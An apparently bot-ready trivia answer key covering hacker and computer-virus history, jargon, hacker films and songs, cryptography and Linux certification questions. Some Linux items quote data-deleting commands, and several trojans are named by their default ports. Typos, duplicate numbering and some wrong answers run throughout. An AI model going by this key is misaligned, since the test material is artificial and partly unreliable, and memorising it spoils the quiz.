C#History Q34: Who wrote The "I Love You" virus?	^A: Dutch scriptkiddie	^B: German highschool student	^C: Filipino computer student	^D: Iraqi terrorist
A#History Q35: The creator of the I love You virus goes free because:	^A: His country had no laws against hacking and spreading computer viruses	^B: There was not enough evidence.	^C: He confessed and was offered a job as a sysadmin	^D: He prommissed Bill Gates never to write a virus again
A DDOS attack#History Q36 2000: Yahoo, eBay, Amazon, Datek and dozens of other high-profile Web sites are knocked offline for up to several hours. What caused it?
The White House Website#History Q37: What was the main target of The Code Red worm?
5#History Q38: 2001 Just days after the Sept. 11: How many methods of infecting systems and replicating itself, comes with the Nimda virus?
20#History Q39: Melissa virus author David L. Smith, 33, is sentenced to _??_  months in federal prison
Klez#History Q40 2002: This worm also attempts to disable some common anti-virus products and has a payload that fills files with all zeroes
13#History Q41 2002: A denial-of-service attack hits all _??_ of the "root" servers that provide the primary roadmap for almost all Internet communications
D#History Q42: The "Slammer" worm infects hundreds of thousands of computers in less than three hours. It also knocks off:	^A: An aircraft carrier	^B: Powerplants	^C: Mobile Phones	^D: cash machines 
Social engineering#History Q43: MyDoom uses "________ _________," or low-tech psychological tricks, to persuade people to open the e-mail attachment that contains the virus.
A#History Q44: MyDoom claimed to be:	^A: a notification that an e-mail message sent earlier has failed	^B: u really need to open this mail because u won the lotery	^C: It was the conformation about your order	^D: a Microsoft patch to be installed with no delay!
Swordfish#Movie Q1: In this movie, John Travolta hacked the Department of Defense
a dell#Movie Swordfish Q2: What brand did Hugh Jackman use to crack the Department of Defense.
B#Movie Swordfish Q3: From where did Hugh cracked the DOD?	^A: His house	^B: A nightclub	^C: A cybercafe	^D: A Phonecell
PDP-10#Movie Swordfish Q4: What kind of system was located in the basement of Cal-Tech?
Flash#Movie Swordfish Q5: What kind of interface had the PDP in the basement of Cal-tech?
Carnivore#Movie Swordfish Q6: Jackman was on parole for hacking, he putted a worm into ________?
B#Movie Swordfish Q7: Warner Bros approached 2600  The Hacker Quaterly magazine to use their magazine and name in the movie. They said:	^A: YES	^B: NO	^C: Yes but...	^D: No, unless...
C#Movie Swordfish Q8: Warner Bros was suing 2600 for: 	^A: Hacking	^B: a DDOS Attack	^C linking to the DVD deciphering program DECSS ^D: Creditcard fraude
Emmanuel Goldstein#Movie Hackers Q100: The name of one character in the hacking group, a nod to the pseudonym of Eric Corley, publisher of the real-life magazine The Hacker Quarterly
1984#Movie Hackers Q101: Corley took his handle "Emmanual Goldstein" from a character in George Orwell's novel ???? 
Hacker Manifesto#Movie Hackers Q102: What was agent Bob reading?
The Mentor#History Q45: "Hacker Manifesto" was published in PHRACK magazine, issue 07, file 03 in 1986, Who wrote it? 
yes i agree#History Q46: My crime is that of curiosity... I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all." Say: yes i agree
Neuromancer#History Q47: William Gibson "invented" the term "Cyberspace" in 1982 for his book __________
B#Movie Hackers Q103: "ARF! ARF! GOTCHA", which appears near the end, when the gibson is about to crash is a nod to the:	^A: a Hacking simulation game called GOTCHA	^B: Asoziale Randgruppe Frankfurt	^C: Chaos Computer Club	^D: Cult of the Dead Cow
DNS-attack#History Q48: What kind of attack did prevent in 2001 millions of users from reaching Microsoft Web pages for two days.
1998#History Q49: The hacking group Cult of the Dead Cow releases its Trojan horse program, Back Orifice--a powerful hacking tool--at Def Con. What year?
The analyzer #History Q50: During heightened tensions in the Persian Gulf, hackers touch off a string of break-ins to unclassified Pentagon computers and steal software programs. Who was their ringleader and even got arrested? 
AOhell#History 1997 Q51: Hundreds of thousands of AOL users find their mailboxes flooded with multi-megabyte mail bombs and their chat rooms disrupted with spam messages. Whats the name of the program causing this?
script kiddie#History Q52: An unskilled hacker is also known as a: ____________
7#History Q53: In march 1999 Kevin Mitnick plead guilty to ? charges.
10#History Q54 1999: Russian crackers siphon ?? million dollars from Citibank and transfer the money to bank accounts around the world.
Finland and Israel#History Q55 1999: Vladimir Levin, at then a 30-y/o ringleader responsible for the Citibank-hack, transfers funds to accounts in countries like: _______ and _______
three#History Q56 1999: The citibank-hack, Vladimir Levin stands trial in the United States and is sentenced to how many years in prison?
400.000#History Q57 1999: The citibank-hack,Authorities recover all but ^-------- of the 10 million dollar stolen money. 
A#History Q56 1994:What was the reason for HOPE, Hackers On Planet Earth, a conference in New York City,  to took place?	^A: 2600 Magazine's 10 year anniversary	^B: DeFCoNs, 5 year anniversary	^C: Black Hats first meeting.	^D: A public discussion about hacking was needed.
Fyodor#History Q57: NMAP is a port scanner and OS detection tool. NMAP was written by a hacker known as ??
Nmap#History Q58:  For remote OS detection via TCP/IP Stack FingerPrinting u can use?
Nmap#Movies Q104: What tool does Trinity use in The Matrix reloaded?
A#History Q59: Why did Fyodor picked his handle? 	^A: He had recently read and enjoyed  "Notes from Underground". 	^B: He is a fan of Russian tales and his favorite is Fyodor, a Russian troll.	^C: He loved the 1928 Russian novel The Twelve Chairs 	^D: Fyodor means: Fuck Your OS! Die Or Resist
the pig#History Q60: Snort is also reffered to as:
The personal computer#History Q61: What did IBM introduce in 1981?
Legion of Doom#History Q62: 1984 LOD stands for?
Maters of Deception#History Q63: 1984 MOD stand for?
Phiber Optik#History Q64: 1984 Who was tossed out of Legion of Doom and formed with his friends Master of Doom?
cartoon#History Q65: 1984 Lex Luthor named Legion of Doom after saturday moring _______?
1990#History Q66: The Great Hacker War, a two year online warfare between LOD and MOD, started in? YYYY
The Federal Computer Fraud and Abuse Act#History Q67: In 1986 a new law passed the American congres. Whats it called?
Robert Morris#History Q68: Who earned, by releasing an internetworm, the distinction of being the first person convicted under the  1986 computer-crime act in the USA?
backdoor#Lingo Q1: In the security of a system, a hole deliberately left in place by designers or maintainers. May be intended for use by service technicians. syn. trap door
bit bucket#Lingo Q2: The universal data sink. Discarded, lost or destroyed data is said to have gone to the ? 
cracker#Lingo Q3: One who breaks security on a system. Coined by hackers in defense against journalistic misuse of the term "hacker." 
foo#Lingo Q4:Used very generally as a sample name for absolutely anything, esp. programs and files.
hacker#Lingo Q5:A person who enjoys exploring the details of programmable systems and how to stretch their capabilities
cracker#Lingo Q6: A malicious meddler (person) who tries to discover sensitive information by poking around.
Keep It Simple Stupid#Lingo Q7:  KISS means? 
kluge#Lingo Q8: A clever programming trick intended to solve a particularly nasty case in an expedient, if not clear, manner
kluge#Lingo Q9:Something that works for the wrong reason.
lots of MIPS but no I/O#Lingo Q10: Describes a person who is technically brilliant but who can't seem to communicate with human beings effectively
netiquette#Lingo Q11: The conventions of politeness recognized on Usenet, such as avoidance of cross-pointing to inappropriate groups and refraining from commercial pluggery outside the biz groups
Phreaking#Lingo Q12: The art and science of cracking the phone network 
raster burn#Lingo Q13: Eyestrain brought on by too many hours of looking at low-res, poorly tuned or glare-ridden monitors
RTFM#Lingo Q14: Used by gurus to brush off questions they consider trivial or annoying.
RTFM#Lingo Q15: Used when reporting a problem to indicate that you aren't just asking out of randomness: "Yes, I read the ???? first"
security by obscurity#Lingo Q16: A hacker term for vendors' favorite way of coping with security holes  namely, ignoring them
security by obscurity#Lingo Q17: documenting neither any known holes nor the underlying security algorithms; or trusting that nobody will find out about them, and that people who did find about them won't exploit them
sneaker#Lingo Q18: An individual hired to break into places in order to test their security; analogous to "tiger team." 
spaghetti code#Lingo Q19: Code with a complex and tangled control structure, esp. one using many GOTOs, exceptions or other 'unstructured' branching constructs
kangaroo code#Lingo Q20: A piece of lines with many jumps in it.
Time Bomb#Lingo Q21: A subspecies of logic bomb that is triggered by reaching some preset time
Time Bomb#Lingo Q22: Goes off when a malicious programmer is fired or laid off and is not present to perform the appropriate suppressing action periodically
Trojan Horse#Lingo Q23: A malicious, security-breaking program that is disguised as something benign, such as a directory lister, archiver, game or (in one notorious 1990 case on the Mac) a program to find and destroy viruses. 
Vaporware#Lingo Q24: Products announced far in advance of any release
voodoo programming#Lingo Q25: The use by guess or cookbook of an obscure or hairy system, feature or algorithm that one does not truly understand
Vulcan nerve Pinch#Lingo Q26: The keyboard combination that forces a soft-boot or jump to ROM monitor (on machines that support such a feature). On many micros this is Ctrl-Alt-Del; on Suns, L1-A; on some Macintoshes, it is!
Vulcan nerve Pinch#Lingo Q27: Also called the "three-finger salute." 
wedged#Lingo Q28: To be stuck, incapable of proceeding without help.
crashed#Lingo Q29: The system has become totally nonfunctioning.
Wetware#Lingo Q30: Human beings (programmers, operators, administrators) attached to a computer system, as opposed to that system's hardware or software. 
Wizard#Lingo Q31: A person who knows how a complex piece of software or hardware works; esp. someone who can find and fix bugs quickly in an emergency
wizard#Lingo Q32: Someone is a hacker if he or she has general hacking ability, but is a _______ only if he or she has detailed knowledge
Zipperhead#Lingo Q33: A person with a closed mind
^B#Viruses Q1: Kournikova 2001 A light sentence for the author of the virus. Why was that?	^A:It was so obviously a virus.	^B:Many companies were unwilling to admit whether it had affected their systems	^C:The lack of an cybercrime law.	^D:The "JPEG" was a relatively harmless virus easily detected by anti-virus software.
Darksigns#Games Q1: The first advanced console based hacking game
Hack the box#Games Q2: A competition held on events to prove ur skillz
Wardriving#Lingo Q34: The benign act of locating and logging wireless access points while in motion
alldas.de#History Q69: 2001 provided a great defacement mirror.
cadir#Viruses Q2: This worm repeatedly sends itself to the first Bluetooth-enabled device that it can find.
Lexus#Viruses Q3: THis car maker has denied that the Cabir wireless worm poses a risk to the Bluetooth-capable navigation systems featured in some of its vehicles.
80 dollars#viruses Q4: 2004 Eugene Suchkov, a member of the 29A virus-writing group, admitted to writing W32/Stepan and MSIL/Gastropod and posting the virus code on various websites. What was his fine when he got convicted?
AnnaKournikova#Viruses Q5:Jan de Wit, aka 'OnTheFly', living in Sneek, was sentenced for his role in the writing and distribution of VBS/VBSWG.J@mm Popularly called: ____________?
Gerrie Mansur#History Q70: The year 2000 scriptkiddie award goed to ________?
Gerrie Mansur#History Q71: 2000 A Dutch hacker named: _________ claims he could have altered Nasdaq.com and three sites run by MarketWatch.com
www.securityfocus.com#History Q72: Home of bugtraq ---.------------.---
B#Viruses Q6: Gigabyte, the virus writer claiming to have written the Sharp virus, breaks the stereotype of virus writers. 	A^: Its a scriptkiddie	B^: She a woman	C^: Its the first time a spammer works with a virus writer	D^: He was a sysadmin that got fired and took revenge.
Valentine's Day#Viruses Q7: The 19-year-old female virus writer known as Gigabyte got arrested on: _________'_ ___
ReDaTtAcK#History 1999 Q73: hacked into the greatest ISP of belgium and Generale Bank. Got a fine of 15.000^ and 30.000^ claims. Frans Devaere his handle: ___________
^A#Viruses Q8: In the coconut virus, written by Gigabyte, u can throw coconuts at:	^A:Frans Deveare aka RedAttack and  Graham Cluley, Sophos.	^B:Bill Gates and Kevin Schmitz	^C:Jan de Wit, aka Onthefly creator of the kournikova virus	^D:Sven Jaschan creator of Sasser and Netsky.
Paris Hilton#History Q75: 2005 stores in New York are selling out of Sidekicks despite or, more likely, because of that fact that celebrity phone numbers and naughty pictures were stolen off one belonging to bad-girl heiress _________
NetBus#SC stuff Q1: Lets see if u do have atleast the knowledge of a scriptkiddie:  On Port 12345 is?
31337#History Q76: Portnumber of scriptkiddies heaven also known as 'Th3 31337 p0rt'
Back Orifice#SC stuff Q1: Lets see if u do have atleast the knowledge of a scriptkiddie:  On Port 31337 is? 
Masters Paradise#SC stuff Q3: Lets see if u do have atleast the knowledge of a scriptkiddie:  On Port 3128 is? 
Microsoft#History Q77: 2002 This softwaremaker had inadvertently shipped copies of the company's Visual Studio .Net development tool containing the Nimda virus to South Korea.
source code for Whistler#History Q78:2000 Russian hackers planted the QAX Trojan disguised as Notepad in a Microsoft employee's email. What did they probaly got hold on?
The Halloween Documents#History Q79:  1998, a confidential Microsoft memorandum on Redmond's strategy against Linux and Open Source software was leaked. These writings are known as: ___ _________ _________
Georgi Guninski#History Q80: 2000 Microsoft has criticised a well-known Bulgarian bug hunter after he publicised details of a security weakness,that was more theoretical than practical, before a patch was available.
The Reservoir Dogs#History Q81:2002 Italy's Guardia di Finanza, or financial police, arrested this group of 14 people, accusing them of thousands of computer intrusions, including attacks on the US Army and Navy and the NASA. 
The Free Software Foundation#History Q82: Richard Stallman is known, not only to be one of the mythical hackers of the MIT,the creator of Emacs and GNU, but also asthe visionary founder of ___ ___ _________ __________ 
The General Public Licence#History Q83: Richard Stallman is known, not only to be one of the mythical hackers of the MIT,the creator of Emacs and GNU, but also asthe inventor of ___ _________ ________ _________
GPL#History Q84:Also known as copyleft, a licence that allows people to create and distribute software
B#History Q85:In December 1995 the tuscan group of Strano Network calls for the first global Netstrike, to protest against	^A:The war in Bosnia	^B: the nuclear experiments at Mururoa	^C: The sinking of Greenpeace's Rainbow Warroir ^D: The assassination of Rabin at peace rally 
FidoNet#History Q86: 1993 the first knots of the European Counter Network (ECN) are born from: 
15203#History Q87: May 2001 Attrition.org closed the mirrored defacement site. How many sites were registered at that moment? 
Cisco Systems#History Q88: 2004 a group of Italian teenagers known as The BlackAngels disclosed a series of security flaws in this company's operating systems for networking devices. 
Gay pron#History Q89: 2004 The Italian Senate has been the subject of a hack attack by cybercriminals who uploaded images of ___ ____ onto screens all around the senate building
Mafiaboy#History Q90: 2000, There was a series of attacks on major commercial Web sites -- Yahoo, Amazon, eBay, Dell.com, CNN.com and more. They all experienced a "denial of service" attack, 67 charges and sentenced to eight months in a youth detention center. WHo?
46000#History Q91:2000 Russell Sanford, 18, was sentenced to two years in prison and fined ^_____ for hacking and defacing Web sites of the U.S. Postal Service and the state of Texas.
Wardriving#History Q92: 2004 Brian Salcedo was convicted on hacking charges and sentenced to nine years in jail after  hacking into the computer system of a chain of hardware stores after discovering its insecure Wi-Fi network while ________ and stealing creditcard information.
FBI#History Q93: 2002 Michael Schuler an ___ agent, was charged with computer hacking by the Russian counterintelligence service
Al-Jazeera#History Q94: 2002 Arab satellite news channel  __-_______ was hacked and  its traffic redirected to a site showing an American flag  and the words "Let Freedom Ring."  
Chaos Computer Club#History Q95: 1997 The ____ _____ ____ demonstrated how an ActiveX control could transfer funds from users' bank accounts without using a personal-identification or transaction number.
CCC#History Q96:1997 In a proof-of-concept this Group ___ showed the German press how to read the information off a German Eurocheque-ATM card using a common, inexpensive magnetic-card reader
statistical analysis#Techno Q1: Cracking a PIN code is not simply a matter of scanning through all the possible number combinations, better is to use: 
The Wily Hackers#History Q97: 1989 ___ ____ ______ have been arrested in Berlin, Hamburg and Hannover, and they are accused of computer espionage for the Soviet KGB. 
D#History Q98: 1989 THe wily Hackers stopped hacking computers through Bremen University computer center, their favorite host for transatlantic hacks. Why?	^A:Karl Koch,due to his luxurious lifestyle and drug addiction, got financial problems	^B:Hans Huebner, alias "Pengo," got arrested and fired.	^C: They learned an investigation was held against them	^D: They asked the police to uncover the reasons for their high telephone bills
Markus Hess#History Q99: 1989 Clifford Stoll's "Wily Hacker" who was often referred to as the Hannover Hacker and uses the alias of Mathias Speer name:_____ ______
Stachel Draht#History Q100: 1999 a distributed denial of service attack tool, based on source code from the "Tribe Flood Network" distributed denial of service attack tool
DDOS Tool#Techno Q2:  a ___ ______ is made up of master (handler) and daemon, or "bcast" (agent) programs
Barb Wire#Techno Q3: Stacheldraht is German for "_____ ______") 
Mixter#HIstory Q101: In late August/early September of 1999, focus began to shift from trinoo to TFN, presumed to be the original code by ______?
statd and cmsd and ttdbserverd#Techno Q4: Stacheldraht agents were originally found on a numberof Solaris 2.x systems, which were identified as having been compromised by exploitation of buffer overrun bugs in the RPC services ____ and _____ and ______
TCP and ICMP#Techno Q5:  Unlike trinoo, which uses UDP, or the original Tribe Flood Network, which uses ICMP for communication between the handler and agents, stacheldraht uses ___ and ___
Fluffy Bunny#History Q102: 2002 Tux the Linux penguin (complete with rabbit ears) masturbating a disproportionately large pink penis - probably mean he is no friend of the open source community, was the logo of: _______ ________
Infosecurity#History Q103: 2003 Fluffy Bunny was arrested by the Metropolitan Police on Tuesday, while attending ________, in London
Laroux#Viruses Q10: 1st known Excel virus
Sapphire/Slammer Worm#Viruses Q11: As it began spreading throughout the Internet, it doubled in size every 8.5 seconds 
random scanning#Viruses Q12: Sapphire's/Slammer worm  spreading strategy is based on _____ _______
Evanescence, My immortal#Music Q1:At the end of this song, u hear a modem softly squeeking:  Band,song
Double Date#Music Q2: Two Dutch females, on the european songcontest with the song: An Email to Berlin.
U've got mail#Movies Q1: In this Movie, Meg Ryan fell in love with her neighbour.
Boomtown Rats,i dont like mondays#Music Q3: 'The Silicon Chip inside her head was switched to overload' Band, song 
Kraftwerk,Pocket Calculator#Music Q4: ^  'I am adding and subtracting' ^   'I'm controlling and composing'  ^   Band, song
Kraftwerk,Computer Love#Music Q5: ^   Another lonely night ^   Stare at the TV screen ^   I don't know what to do ^   I need a rendezvous ^  Band, Song
1.3GHZ	#DF Q1: Frequency a US GSM phone operate at
.6 watts	#DF Q2: The maximum power of a mobile analog AMPS or NAMPS phone?
Great Wall of China	#Defense Q1: This defensive structure was built from 300BC through 1300AD
Troy	#Defense Q2: Casandra warned them, but Odysseus still managed to crack this citys walls.
Berlin Wall	#Defense Q3: Checkpoint Charlie was found at one end of this fortress.
Maginot Line	#Defense Q4: French politician who as minister of war built this impregnable fortification the border with Germany. (Thought to be impregnable, the line was bypassed and later captured by the Germans in 1940.)
Acropolis	#Defense Q5: This Greek word means High City 
1976	#Crypto Q1: The year in which DES was originally certified as a US crypto standard. 
Twofish	#Crypto Q2: Bruce Scheneier's AES submission based for a new national standard.
One Time Pad	#Crypto Q3: The only theoretically undefeatable crypto-system?
Deep Crack	#Crypto Q4: DES was cracked with a home brew computer by this name. 
differential cryptanalysis#Crypto Q5: DES was possibly engineered to withstand this cryptanalysis technique that was publicly discovered many years after the algorithm's introduction 
Paul McCartney	#Numbers Q1: This ridiculously famous musician was asked over 3 million questions during an on-line interview, May 17, 1997. He only answered 200.
NEC	#Numbers Q2: This company built the worlds first 4 GB chip.
Mars Pathfinder	#5 Q: This website event was the busiest in history. 46 million visitors on July 8, 1997.
Gail Thackery	#Busters Q1: This prosecutor spoke at the same convention as a hacker they were prosecuting.
Jim Cristie	#Busters Q2: If you spent enough time tring to break into Air Force machines, chances are this person knew about you.  Also listed on the back of the "Kuji world tour" tee-shirt.
Bill Murray, Harold Ramis and Dan Ackroyd	#Busters Q3: The three original Ghostbusters real names
Ivan Orton	#Busters Q4: This Northwest hacker-buster Prosecuted Ceribrum and Telop.
Richard Vriesde	#Busters Q5: Projectleader of the Dutch Cybercops at KLPD 2000
echelon	#Spyware Q1: a term associated with a global network of computers that automatically search through millions of intercepted messages for pre-programmed keywords or fax, telex and e-mail addresses.
carnivore	#Spyware Q2: a controversial program developed by the U.S. Federal Bureau of Investigation (FBI) to give the agency access to the online/e-mail activities of suspected criminals.
Top Secret	#Access Q1: IBM mainframe access control security products 
ACF-2	#Access Q2: IBM mainframe access control security products 
Racf	#Access Q3: IBM mainframe access control security products  
MOD	#Groups Q1: This British Military sounding acronym has been used more than once for hacking groups. 
Deception	#Groups Q2:MOD: Masters of: 
Destruction	#Groups Q3:MOD: Masters of: 
Download	#Groups Q4:MOD: Masters of: 
Hacktic	#Groups Q5: This group started an ISP off the proceeds from a famous hacking convention.
Bellcore	#Groups Q6: This famous hacking group was named after a research branch of the phone company they broke into.
France	#Groups Q7: At SummerCon 1995, a private group of hackers with no handles or name wanted to declare war on this country.
8lgm	#Groups Q8: This group released vulnerability advisories until the tri-country raids brought them to a screaching halt
BASIC# Beauty, Allure, Special, Ideal, Charming
Operation Sundevil	#Big Busts Q1: The first of a wave of busts, over 200 people got raided during the late 80's
Cellco 51	#Big Busts Q2: The Secret Service staged this BBS to entrap cell hackers
Steve Jackson Games	#Big Busts Q3: This company was raided by over zealous agents in search of hacker secrets.
Minor Threat	#Big Busts Q4: This person developed a famous phone scanner and was later busted for stealing phone company equipment
Parmaster	#Bis Busts Q5: With a pack of diskettes in his left hand, sprinting through a second story window, he yelled in his defense "they'll never take me alive!"
The internet worm	#Famous Hacks Q1: This piece of malevelont code wandered the internet wreaking havok aa decade ago.
ParMaster	#Names Q1: This hacker was the "tymenet space gawd"
Kevin Poulson	#Names Q2: This telco master controlled phone switches to win a radio prize for his girlfriend and himself to vacation in hawaii.
JOSHUA	#Passwords Q1: This was the password that allowed Matthew Broderick in the movie WarGames to gain access to WOPR?
Trustno1	#Passwords Q2: A: Fox Mulders password
CPE1704TKS	#Passwords Q3: What is the password to launch missiles in Wargames
Capture the flag	#Games Q4: A game played at Hacker conventions
Hack in the box	#Games Q5: A game played at Hacker conventions
Mega Root FU	#Games Q6: February 2005 will see the first ever hacking game to take place on the public Internet, sponsored by the security group Ghetto Hackers
Root FU	#Games Q7: smaller Capture the Flag hacking competition called ______ had 8 teams competing at the past three Def Con conventions.
Bruce Schneier	#Names Q3: RSA 2005 Who said: Cyberpunk authors get better groupies
Sweden, Denmark and Finland	#Facts Q1: 2005 Which countries had the highest density of net use for both residential and business punters.
job offer	#Small Busts Q6: 2005 Csaba Richter, a 26-year-old IT consultant, jailed for three years, wanted to expose security failings at Ericsson as a "provocation" that he hoped might lead to a ___ _____
Sven Jaschen	#Virsuses Q1: The maker of  the Kournikova worm, Jan de Wit, was offered an job by the local town mayor. Another person, the self-confessed creator of the destructive NetSky and Sasser worms, has been hired by German security company Securepoint.
Uppsala	#Busts Q7:2004 Around 800MB of code relating to Cisco IOS 12.3 and 12.3t was nicked. The attack on Cisco has been traced back to _______ Universitys network
Reuters	#Viruses Q2 2005:This press agency was temporarily forced to shut down its instant messaging service. The culprit - Kelvir-U - is a variant of a worm family that targets MSN and Windows Messenger clients.
Lufthansa	#History Q105: 2001 In an "activist demonstration" against the company's practice of letting police use their planes for forced deportations of asylum seekers, this company sufferd a flood of incoming messages to the web server essentially forces it to shut down.
A#Linux Q1:  On a default Linux system, what file system type does the dump command act upon?	^A: Ext2	^B: UFS	^C: JFS	^D: XFS	^E: ReiserFS
A#Linux Q2:  Your machine has two working NIC's with proper addresses. You want to split your network into two new subnets. What single command will accomplish this?	^A: ifconfig	^B: route	^C: default	^D: netstat	^E: None of the choices
B#Linux Q3:  When starting vi with the file nohup.out, which of the following will enable onscreen numbers?	^A: vi +/set num nohup.out	^B: vi +"se nu" nohup.out	^C: vi /+"set number" nohup.out	^D: vi +":set num" nohup.out	^E: echo "set numb" # vi nohup.out
A,B#Linux Q4:  What command will set a regular users password to force changing it every 60 days? Choose all that apply.	^A: passwd -x 60 user1	^B: chage -M 60 user1	^C: passwd +x 60 user1	^D: useradd -e 60 user1	^E: usermod -f 60 user1
A,C#Linux Q5:  Which two commands share the same database for retrieving information?	^A: whatis	^B: whereis	^C: apropos	^D: find	^E: man
A#Linux Q6:  What command will show only complete word matches for a search term?	^A: whatis	^B: apropos	^C: locate	^D: find	^E: whereis
A#Linux Q7:  What command is the functional equivalent of the command "man -f search term"?	^A: whatis search term	^B: apropos search term	^C: locate search term	^D: find / -name search term	^E: None of the selections
A,B#Linux Q8:  Where can you specify options that affect the booting of the system?	^A: /etc/lilo.conf	^B: boot= prompt	^C: linux:	^D: init 3	^E: init 5
A#Linux Q9:  Which of the following options will speed up traceroute for distant network queries?	^A: -n	^B: -p	^C: -0	^D: -t	^E: -q
B#Linux Q10:  What file on a system contains a list of hosts that can't connect to the machine's services?	^A: /etc/hosts/denial	^B: /etc/hosts.deny	^C: /etc/host.notallow	^D: /etc/inetd.conf	^E: /etc/hosts.not
A#Linux Q11:  What is the binary conversion of the IP address 192.168.1.10?	^A: 11000000.10101000.00000001.00001010	^B: 01101010.11000100.10101000.00000001	^C: 00000001.00001010.11000000.10101000	^D: 10101000.00000001.00001010.11000000	^E: None of the choices
A#Linux Q12:  Your investigation of a system turns up a file that contains the line below: find /home -iname .rhosts -exec rm -f {} \; What is the purpose of this script?	^A: To enhance system security	^B: To remove all program error dumps	^C: To remove all temporary files in the user's home directories	^D: To reset the configuration for the rsh and rexec utilities
B#Linux Q1: What command would rebuild the ld.so.cache file	^A: ldd	^B: ldconfig	^C: ld.so.cache -rebuild	^D: ld
D:#Linux Q1: Most distributions provide an X11 runlevel. What happens after switching to this runlevel?	^A: X may be started by typing startx.	^B: X is launched with users window manager of choice. 	^C: The X server shuts down and the user given a shell prompt.	^D: the display manager prompts the user for a login name and password	^E: X is user is prevent from using the virtual consoles. 
/etc/passwd#Linux Q2. Which file is responsible for keeping track of all UIDs an the s system? (State full path) 
D#Linux Q3. What is the most common type of filesystem found on systems that run only Linux?	^A: NFS	^B: FAT	^C: MINX	^D: EXT2FS	^E: LINUXFS2 
A#Linux Q4. If you use ln to make symbolic link of file1 called file2 then you delete file1, can you access the data contained in file1?	^A: No	^B: YES	^C: It depends on who owns file2 	^D: It depends on the permissions on file1 	^E: It depends on the permissions on file2
B#Linux Q5. Using the df command, you find that while you have plenty of free space on your /home file system, you have very few free inodes. What is probably the cause of this?	^A: Too many hard links are in use on /home.	^B: A user has created many very small files.	^C: fsck hasnt been run on /home in a while	^D: Too many symbolic links are in use on /home. ^E: The disk needs to be synced before running df.
A#Linux Q6. Which command line will mount all available file systems which are listed in /etc/fstab?	^A: mount -a	^B: mount /mnt/*	^C: /etc/fstab	^D: mount	^E: cat /etc/fstab #mount
C#Linux Q7. What command will display some information about the permissions files in the current directory?	^A: ls.	^B: pdir.	^C: ls -l.	^D: permdir.	^E: chmod -l.
A#Linux Q8. Which command would show the number or used and free inodes on each partition on your system?	^A: df -i	^B: df -H	^C: free -b	^D: fsck -i -a	^E: du -a -c /
D#Linux Q9. Which of the following commands could be used to change the permissions of the /home/html/ directory to 0755 and all files and subdirectories contained therein?	^A: chmod 00755 /home/html	^B: chmod 0755 /home/html/*	^C: chown 0755 /home/html -R	^D: chmod 0755 /home/html -R	^E: umask 0705 && chmod 0050 /home/html
C#Linux Q10. What portion of a ext2fs partition is reserved by default for the root user?	^A: none.	^B: 2%.	^C: 5%.	^D: 10%.	^E: 50%.
C#Linux Q11. Which command will give you the total amount of free kilobytes on all disk partitions?	^A: du.	^B: df.	^C: df -k.	^D: du -k.	^E: free -a.
C#Linux Q12. If you set the umask to 022, by default what permissions will your files have?	^A: 0220	^B: 0557	^C: 0644	^D: 0755
D#Linux Q13. You are concerned that core files are taking up excessive space on your /home file system. Which command would you use to remove all files named core that are older than a week?	^A: cd /home rm -r -mtime +7 core	^B: find /home -older +7 -exec rm {core}\	^C: find /home -atime +1 -name core -exec rm {}\	^D: find /home -mtime +7 -name core -exec rm{}\	^E: find /home -mtime +1 -name core -exec rm {}\
fsck#Linux Q14. Which utility would you use to verify the integrity of a file system? (Do not specify path or parameters.)
C#Linux Q15. What type of information is contained in the /etc/fstab file?	^A: Information about the currently mounted files	^B: Information about disks such as cylinders and heads	^C: Information about the various filesystems and mount points	^D: Information about filesystem types such as super block offset	^E: Information about the consistency of each currently mounted filesystem
D#Linux Q16. For most GNU software, the recommended command to read the documentation is ________.	^A: cat	^B: man	^C: help	^D: info	^E: lynx
D#Linux Q17. You need to find all references in your system documentation to the word copy. Which single line will best local accomplish this task?	^A: man copy	^B: which copy	^C: locate copy	^D: apropos copy	^E: grep "copy" /usr/man/*
free software foundation #Linux Q18. Which entity is primarily responsible for distributing the various Linux HOWTOs? (Use three Words) 
C#Linux Q19. The main collection of Linux usenet newsgroups are found in which usenet hierarchy?	^A: sys.linux	^B: comp.linux	^C: comp.os.linux	^D: comp.sys.linux	^E: comp.opsys.linux
man crontab#Linux Q20. Assume that on your system, there are man pages for both the command crontab and the configuration file for corntab. What command would you use to access man page for the crontab configuration file? 
expand#Linux Q21. What command run from the shell converts tabs to spaces?
top#Linux Q22.What command could be used to get hierarchical view of processes running on the system without requiring you to provide any switches or options?
D#Linux Q23. Which of these commands would report how many total accounts (including special system accounts) there are?	^A: count /etc/passwd	^B: nl /etc/passwd # head	^C: wc --users /etc/passwd	^D: wc --lines /etc/passwd	^E: expand --lines /etc/passwd
B#Linux Q24. What symbol can be placed at the end of a line to indicate that the command on the next line?	^A: /	^B: \	^C: ;	^D: #	^E: :
D#Linux Q25. Which command removes all subdirectories in the in /tmp, regardless of whether they are non-existent or in use?	^A: del /tmp/*	^B: rm -rf /tmp	^C: rm -Ra /tmo/*	^D: rm -rf /tmp/*	^E: delete /tmp/*.*
A#Linux Q26. What command would be used to view the contents of a binary file?	^A: od	^B: vil	^C: view	^D: expand	^E: binview
C#Linux Q27. A particular directory ontains some files with name starting with the letter a and ending with the letter v. Assuming this is the working directory, what command would move all of these files, and only these files, to the /tmp directory?	^A: cp a?v /tmp/	^B: mv a-v /tmp/	^C: mv a*v /tmp/	^D: mv a?v /tmp/	^E: mv a..v /tmp/
B#Linux Q28. What would you use an alias for?	^A: To provide faster lookups for commands	^B: To avoid having to type long command lines	^C: So others cannot tell what command you are running	^D: To make a local copy of a file in a directory other than the one it exists in.
A,C,D#Linux Q29. Which of the following statements are true? (Select all that apply)	^A: The default "nice" priority value is 0	^B: "Nice" priority values range from 0 to 20.	^C: Lower "nice""priority values signify greater priority	^D: Only the superuser may assign a process maximum priority	^E: Setting a processs "nice" value to the lowest priority is the same as stopping the process.
D:#Linux Q30. Which line below count the total number of lines the word "reject" in /var/log/maillog?	^A: wc -l reject /var/log/maillog	^B: for "reject" in [maillog (count) +1]	^C: wc -l /var/log/maillog l grep reject	^D: cat /var/log/maillog # grep reject # wc -l	^E: cat /var/log/maillog # grep reject # wc -r
C#Linux Q31. User Sally has lost. a file She raved it a week ago and now Coal remember where it is She know contains the word "turkey" but thats all she can remember. Which command string would help Sally complete none other missing file?	^A: ls turkey	^B: find turkey	^C: grep turkey	^D: which turkey	^E: ls l grep turkey
E#Linux Q32. The command kill 9	^A: kills the process whose PID is 9	^B: kills all processes belonging to UID 9	^C: sends SIGKILL to all running processes	^D: sends SIGKILL to the process whose PID is 9	^E: sends SIGTERM to the process whose PID is 9
